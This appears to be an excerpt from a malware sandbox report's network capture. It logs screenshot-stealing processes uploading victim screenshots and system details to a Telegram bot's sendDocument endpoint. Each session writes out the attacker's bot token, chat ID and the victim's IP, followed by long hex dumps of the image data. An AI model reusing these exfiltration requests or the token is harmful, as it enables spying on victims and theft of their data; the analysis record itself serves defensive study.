                                                                  {"ok":true,"result":{"message_id":3448,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548171,"document":{"file_name":"user-618321 2024-06-03 21-51-36.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg14ZiKrixEMDFOrv0-MqS5OQUzVbIwAArwXAAKLUhlRjz2FjZtYOeIBAAdtAAM0BA","file_unique_id":"AQADvBcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg14ZiKrixEMDFOrv0-MqS5OQUzVbIwAArwXAAKLUhlRjz2FjZtYOeIBAAdtAAM0BA","file_unique_id":"AQADvBcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINeGYiq4sRDAxTq79PjKkuTkFM1WyMAAK8FwACi1IZUY89hY2bWDniNAQ","file_unique_id":"AgADvBcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/03/2024 21:46:30\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.549731149.154.167.2204437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:31 UTC238OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc7d9f4e31c274
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:36:31 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 64 39 66 34 65 33 31 63 32 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 64 39 66 34 65 33 31 63 32 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 36 2f 32 30 32 34 20 31 36 3a 31 32 3a 31 33 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc7d9f4e31c274Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc7d9f4e31c274Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/26/2024 16:12:13User
                                                                  2024-04-19 17:36:31 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:31 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:31 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:31 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:31 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:31 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 64 39 66 34 65 33 31 63 32 37 34 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc7d9f4e31c274--
                                                                  2024-04-19 17:36:31 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:32 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:32 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3449,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548192,"document":{"file_name":"user-618321 2024-05-26 16-17-14.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg15ZiKroDIbP-HD72oGl0QnSFXOxLcAAr0XAAKLUhlRPqa5jMe5tbYBAAdtAAM0BA","file_unique_id":"AQADvRcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg15ZiKroDIbP-HD72oGl0QnSFXOxLcAAr0XAAKLUhlRPqa5jMe5tbYBAAdtAAM0BA","file_unique_id":"AQADvRcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINeWYiq6AyGz_hw-9qBpdEJ0hVzsS3AAK9FwACi1IZUT6muYzHubW2NAQ","file_unique_id":"AgADvRcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 05/26/2024 16:12:13\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.549732149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:35 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc8b4b8f6210f4
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:36:36 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 62 34 62 38 66 36 32 31 30 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 62 34 62 38 66 36 32 31 30 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 31 33 2f 32 30 32 34 20 30 31 3a 34 38 3a 30 30 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc8b4b8f6210f4Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc8b4b8f6210f4Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/13/2024 01:48:00User
                                                                  2024-04-19 17:36:36 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:36:36 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:36:36 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:36:36 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:36:36 UTC1552OUTData Raw: a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 02 4a 2a 3f 3e 1f f9 ea 9f f7 d0 a3 cf 87 fe 7a a7 fd f4 28 00 9f fe 3d e4 ff 00 74 ff 00 2a f9 e6 be 83 9a 68 8c 12 01 22 12 54 ff 00 10 f4 af 9f 2a e2 67 30 ad cd 33 c4 93 d9 d8 fd 82 e6 d6 0b fb 3c ee 58 6e 17 21 4f a8 3d bf 0a c3 a2 a8 83 73 53 f1 24 f7 96 3f 60 b6 b5 82 c2 cf 3b 9a 1b 75 c0 63 ea 4f 7f c6 b0 e8 a2 80 0a 28 a2 98 05 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 ac 8a 29 01 a7 2e b9
                                                                  Data Ascii: z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(J*?>z(=t*h"T*g03<Xn!O=sS$?`;ucO(k\[/p(v).
                                                                  2024-04-19 17:36:36 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 62 34 62 38 66 36 32 31 30 66 34 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc8b4b8f6210f4--
                                                                  2024-04-19 17:36:36 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:36:36 UTC1485INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:36:36 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1096
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3450,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548196,"document":{"file_name":"user-618321 2024-06-13 01-53-02.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg16ZiKrpJHaBMUMdNwQAAG13r1nfm0-AAK-FwACi1IZUf7-Xeund9HXAQAHbQADNAQ","file_unique_id":"AQADvhcAAotSGVFy","file_size":12509,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg16ZiKrpJHaBMUMdNwQAAG13r1nfm0-AAK-FwACi1IZUf7-Xeund9HXAQAHbQADNAQ","file_unique_id":"AQADvhcAAotSGVFy","file_size":12509,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINemYiq6SR2gTFDHTcEAABtd69Z35tPgACvhcAAotSGVH-_l3rp3fR1zQE","file_unique_id":"AgADvhcAAotSGVE","file_size":66515},"caption":"New SC Recovered!\n\nTime: 06/13/2024 01:48:00\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.549733149.154.167.2204437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:36:36 UTC238OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc8048c2fa9c0c
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67138
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:36:37 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 34 38 63 32 66 61 39 63 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 30 34 38 63 32 66 61 39 63 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 33 30 2f 32 30 32 34 20 30 31 3a 33 30 3a 31 36 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc8048c2fa9c0cContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc8048c2fa9c0cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/30/2024 01:30:16User
                                                                  2024-04-19 17:36:37 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
